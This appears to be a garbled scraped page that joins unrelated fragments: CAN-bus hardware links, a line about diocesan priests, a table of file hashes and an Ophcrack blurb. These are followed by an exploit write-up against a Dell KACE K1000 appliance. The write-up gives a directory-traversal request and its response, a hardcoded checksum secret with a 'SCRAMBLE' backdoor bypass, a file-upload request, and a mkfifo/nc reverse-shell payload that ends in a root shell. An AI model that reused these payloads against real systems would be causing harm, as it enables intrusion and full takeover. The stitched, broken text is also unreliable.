Connecting Hardware to Your Real Car:
Video Walk Through Using Hardware on a Real Car
Hardware Used:
https://amzn.to/2QSmtyL
Get CANtact:
https://amzn.to/2xCqhMt
Get USB2CAN:
https://shop.8devices.com/usb2can
A place for the international priests working in the Gallup diocese to find and exchange information.

MD5 | SHA256 | SHA1 |
|---|---|---|
85a8aad8d938c44c3f3f51089a60ec16 | 1a75642976449d37acd14b19f67ed7d69499c41aa6304e78c7b2d977e0910e37 | 2f0079bb42d5088f1fec341cb68f15cdd447ac43 |
2c0afe7b13cdd642336ccc7b3e952d8d | 64c0e594d4926a293a1f1771187db8cfb44a0dda80d8b25b4f0c975e1e77745c | fef65085a92654cbcf1e3e0d851c6cda8dd3b03d |
94b8337a2d217286775bcc36d9c862d2 | 71c02b99046c3be12e31577aa6623ce47dfb7f369e67af564d2bd499080c03b6 | d5deeb1b61026479acb421583b7b82d09d63e921 |
417151777eaaccfc62f778d33fd183ff | bf6941e644a430fef43afc749479859665a57b711d5483c2c7072049c7db17b7 | f76b9447db23229edae17a3160e04df41bc35a9d |
d31f047c125deb4c2f879d88b083b9d5 | 2785845c97a69e15c9c1535216732a9d24bcf8f7244ce7872a2b0d2d4bcb92c3 | 4693505ef4c029112c4b85a16762cf90f0d69c15 |
ff1eb225f31e5c29dde47c147f40627e | f7ab3d315961d84da43f30a186136a56f5aa1e9afe6b56a0d357accd5f0ab81a | d5f2a976b703b5e687ffc58c408e0bc880838ae7 |
f3aed39202b51afdd1354adc8362d6bf | fa2bc8d988c8dfbdc965f1373bd80e9f5862868397c1bcb5e84b1e9c1756e0e2 | 31f0bca917cfbffcc126219439d38fe80d5c8460 |
083a5f463cb84f7ae8868cb2eb6a22eb | d654850f7785a5adb34f0808e2952f66e3784c0a32427fab9e97c75f0a48d9f5 | ed4359a2805ce69771253d2257598b5c63c36c8e |
9ce4decd27c303a44ab2e187625934f3 | a2a245f12ae44cca79f03a465e2dc3dfa222dfcfda1017824b16abf397f16255 | 710e85ae3d362d3c8f3759319c308ff9b4dcdc86 |
b6c6c1b2e89de81db8633144f4cb4b7d | 2480be0d00193250bc9eb50b35403399ed44f53d5d919600ee5bab14ef769530 | ee77141054ac8d2fad062bcd79832b5f481c7dfb |
abd5008522f69cca92f8eefeb5f160e2 | 509299df2f6150f59ed777873d3b7c708587c68a4004b4654a8cf2a640dd50aa | 15cf94828c07e080b9c455738f3219859d9ab732 |
a84bbf660ace4f0159f3d13e058235e9 | 565deb4b1a7397d2497c75c9635b81d2e3b6427f0c576e5cd3c4224660712b56 | c56fea8c1c949394e539d5ab3e3df7dfd329844a |
5fec65455bd8c842d672171d475460b6 | 121c7ebfb99d8ef39f72bf7c787be4c15e2e08b731f01172605a4d34d27f08eb | 3b6ca4525c3aad0583400b911b015071a0ea6133 |
4d3cab2d0c51081e509ad25fbd7ff596 | 7f71577b63b449c1a9e9aa516fa9e4320fe5f79548a00025a430894a269ab57b | d521f25362791de4d8a82a2683f032c1dd816e74 |
252e2dfdf04290e7e9fc3c4d61bb3529 | 834fc5c0ccfde1f3d52d88355717f119221118ee2d26018b417c50d066e9e978 | c8f3130e64a6f825b1e97060cf258e9086a2b650 |
5dcdace449052a596bce05328bd23a3b | 22949a7a3424f3b3bdf7d92c5e7a7a0de4eb6bbe9c523d57469944f6a8b1d012 | f2c072560559a3f112e2000c8e28ee975b2b9db3 |
9c66fbe776a97a8613bfa983c7dca149 | 18c08d3c39170652d4770b2f7785e402b58c1f6c51ba1338be4330498ef268f4 | 18a99ec770109357d1adbc1c2475b17d4dcca651 |
59af44a74873ac034bd24ca1c3275af5 | 1c345b5e7c7fdcc79daa5829e0f93f6ae2646f493ae0ec5e8d66ab84a12a2426 | 98f789e91809203fbf1b7255bd0579fc86a982ba |
9642b8aff1fda24baa6abe0aa8c8b173 | 98165c65d83fd95379e2e7878ac690c492ac54143d7b12beec525a9d048bedae | bd447e0e77a9192b29da032db8e1216b7b97f9ed |
e56cec6001f2f6efc0ad7c2fb840aceb | 7a2bf405c5d75e4294c980a26d32e80e108908241751de4c556298826f0960f1 | b1c271d11797baac2504916ac80fd9e6fac61973 |
54d93673f9539f1914008cfe8fd2bbdd | c396a1214956eb35c89b62abc68f7d9e1e5bd0e487f330ed692dd49afed37d5a | 72a9b8d499cce2de352644a8ffeb63fd0edd414b |
6d202084d4f25a0aa2225589dab536e7 | c691fecb7f0d121b5a9b8b807c5767ad17ae3dd9981c47f114d253615d0ef171 | a68149c19bfddcdfc537811a3a78cd48c7c74740 |
cfbf1bd882ae7b87d4b04122d2ab42cb | 892986403d33acb57fca1f61fc87d088b721bdd4b8de3cd99942e1735188125b | a067a0cf99650345a32a65f5bc14ab0da97789b6 |
" Ophcrack is an open source (GPL license) program that cracks Windows LM hashes using rainbow tables. The program includes the ability to import the hashes from a variety of formats, including dumping directly from the SAM files of Windows. There is also a Live CD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. Rainbow tables for LM hashes of alphanumeric passwords are provided for free by the developers. These tables can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. Larger rainbow tables (for LM hashes of passwords with all printable characters, including symbols and space) are available for purchase from Objectif Securité. Starting with version 2.3, Ophcrack also cracks NT hashes. This is necessary if generation of the LM hash is disabled (this is default on Windows Vista), or if the password is longer than 14 characters (in which case the LM hash is not stored)." read more...steponequit@steponequit-desktop:/usr/share/ganglia-webfrontend$ egrep 'include.*\$' *class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )class.TemplatePower.inc.php: $tpl_file = $this->tpl_include[ $regs[2] ][0];class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )class.TemplatePower.inc.php: $include_file = $this->tpl_include[ $regs[2] ][0];class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];class.TemplatePower.inc.php: $include_file = $regs[2];class.TemplatePower.inc.php: if( !@include_once( $include_file ) )class.TemplatePower.inc.php: $this->__errorAlert( 'TemplatePower Error: Couldn\'t include script [ '. $include_file .' ]!' );class.TemplatePower.inc.php: $this->tpl_include["$iblockname"] = Array( $value, $type );graph.php: include_once($graph_file);
$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : NULL;
....
....
....
$graph_file = "$graphdir/$graph.php";
Taking at look at the "sanitize" function I can see this shouldn't upset any file include fun
function sanitize ( $string ) {return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;}#-------------------------------------------------------------------------------# If arg is a valid number, return it. Otherwise, return null.function clean_number( $value ){return is_numeric( $value ) ? $value : null;}
$graph_file = "$graphdir/$graph.php";if ( is_readable($graph_file) ) {include_once($graph_file);$graph_function = "graph_${graph}";$graph_function($rrdtool_graph); // Pass by reference call, $rrdtool_graph modified inplace} else {/* Bad stuff happened. */error_log("Tried to load graph file [$graph_file], but failed. Invalid graph, aborting.");exit();}

$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";.........$php_report_file = $conf['graphdir'] . "/" . $graph . ".php";$json_report_file = $conf['graphdir'] . "/" . $graph . ".json";if( is_file( $php_report_file ) ) {include_once $php_report_file;
POST /userui/downloadpxy.php HTTP/1.1That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download
HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini ;
;;;;;;;;;;;;;;;;;;;
http://targethost/service/kbot_upload.php
$checksumFn = $_GET['filename'];
$fn = rawurldecode($_GET['filename']);
$machineId = $_GET['machineId'];
$checksum = $_GET['checksum'];
$mac = $_GET['mac'];
$kbotId = $_GET['kbotId'];
$version = $_GET['version'];
$patchScheduleId = $_GET['patchscheduleid'];
if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
."($machineId, $checksumFn, $mac)");
KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
."from HandlePUT(".construct_url($_GET).")");
header("Status: 500", true, 500);
return;
}
md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
private static function calcTokenChecksum($filename, $machineId, $mac)
{
//return md5("$filename $machineId $mac" . $ip .
// 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
// our tracking of ips really sucks and when I'm vpn'ed from
// home I couldn't get patching to work, cause the ip that
// was on the machine record was different from the
// remote server ip.
return md5("$filename $machineId $mac" .
'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
}
if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 190
<?php
require_once 'KSudoClient.class.php';
KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?>
http://targethost/service/tmp/db.php
~$ ncat -lkvp 4444
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from XX.XX.XX.XX
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
Directory Traversals: 2That all adds up to owned last time I checked.
Backdoors: 2
Privilege Escalation: 1
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|